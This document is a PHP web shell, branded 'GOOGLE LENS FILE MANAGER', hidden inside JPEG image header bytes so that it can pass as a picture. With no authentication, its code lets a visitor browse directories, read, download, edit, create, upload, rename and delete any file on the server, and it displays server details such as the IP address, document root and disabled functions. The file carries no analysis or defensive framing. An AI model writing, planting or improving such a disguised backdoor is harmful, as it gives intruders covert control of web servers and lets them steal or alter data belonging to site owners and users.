JFIFxxC      C  " }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3RbrJFIFxxC      C  " }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr= 1073741824) { return number_format($bytes / 1073741824, 2) . ' GB'; } elseif ($bytes >= 1048576) { return number_format($bytes / 1048576, 2) . ' MB'; } elseif ($bytes >= 1024) { return number_format($bytes / 1024, 2) . ' KB'; } else { return $bytes . ' B'; } } function getIcon($path) { return is_dir($path) ? '=' : '='; } $currentPath = isset($_GET['d']) ? $_GET['d'] : getcwd(); if (!is_dir($currentPath)) { $currentPath = getcwd(); } if (isset($_POST['submit_edit'])) { $file = $_POST['edited_file']; $content = $_POST['file_content']; if (file_put_contents($file, $content) !== false) { echo ""; } else { echo "Gagal mengedit file."; } exit; } if (isset($_POST['upload'])) { $targetFile = $currentPath . DIRECTORY_SEPARATOR . $_FILES['uploaded_file']['name']; if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $targetFile)) { echo ""; } else { echo ""; } } if (isset($_POST['create_folder'])) { $folderName = $_POST['folder_name']; if ($folderName && mkdir($currentPath . DIRECTORY_SEPARATOR . $folderName)) { echo ""; } else { echo ""; } } if (isset($_POST['rename'])) { $oldPath = $_POST['rename_path']; $newName = $_POST['new_name']; $newPath = dirname($oldPath) . DIRECTORY_SEPARATOR . $newName; if (rename($oldPath, $newPath)) { echo ""; } else { echo ""; } } if (isset($_POST['delete_path'])) { $deletePath = $_POST['delete_path']; if (is_dir($deletePath)) { rmdir($deletePath); } else { unlink($deletePath); } echo ""; } if (isset($_GET['view'])) { $viewPath = $_GET['view']; if (is_file($viewPath)) { header('Content-Type: text/plain'); readfile($viewPath); exit; } } if (isset($_GET['download'])) { $file = $_GET['download']; if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); readfile($file); exit; } else { echo "File not found."; exit; } } if (isset($_GET['edit_file'])) { $file = $_GET['edit_file']; $content = file_get_contents($file); if ($content !== false) { echo 'Edit File

Edit File: '.x($file).'

'; exit; } else { echo "Gagal membaca isi file."; exit; } } if (isset($_POST['create_file'])) { $newFileName = $_POST['new_file_name']; $newFileContent = $_POST['new_file_content']; $newFilePath = $currentPath . DIRECTORY_SEPARATOR . $newFileName; if (file_put_contents($newFilePath, $newFileContent)) { echo ""; } else { echo ""; } } ?> GOOGLE LENS DIRECTORY

Server Information

PHP Version
Server Software
Document Root
Server IP
Client IP
Disable Functions
Operating System

= GOOGLE LENS FILE MANAGER

'; $breadcrumbs = explode(DIRECTORY_SEPARATOR, $currentPath); $breadcrumbPath = ''; $lastIndex = count($breadcrumbs) - 1; foreach ($breadcrumbs as $index => $dir) { $breadcrumbPath .= $dir . DIRECTORY_SEPARATOR; echo ' ' . x($dir) . ' '; if ($index !== $lastIndex) { echo ''; } } echo '
'; ?>



"; } } ?>
Name Permission Size Action
$icon " . x($file) . " $permissions $size
"; if (is_file($fullPath) && is_readable($fullPath)) { echo ""; echo ""; echo ""; } echo "

Powered By GoogleLens

$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?Nm?jEP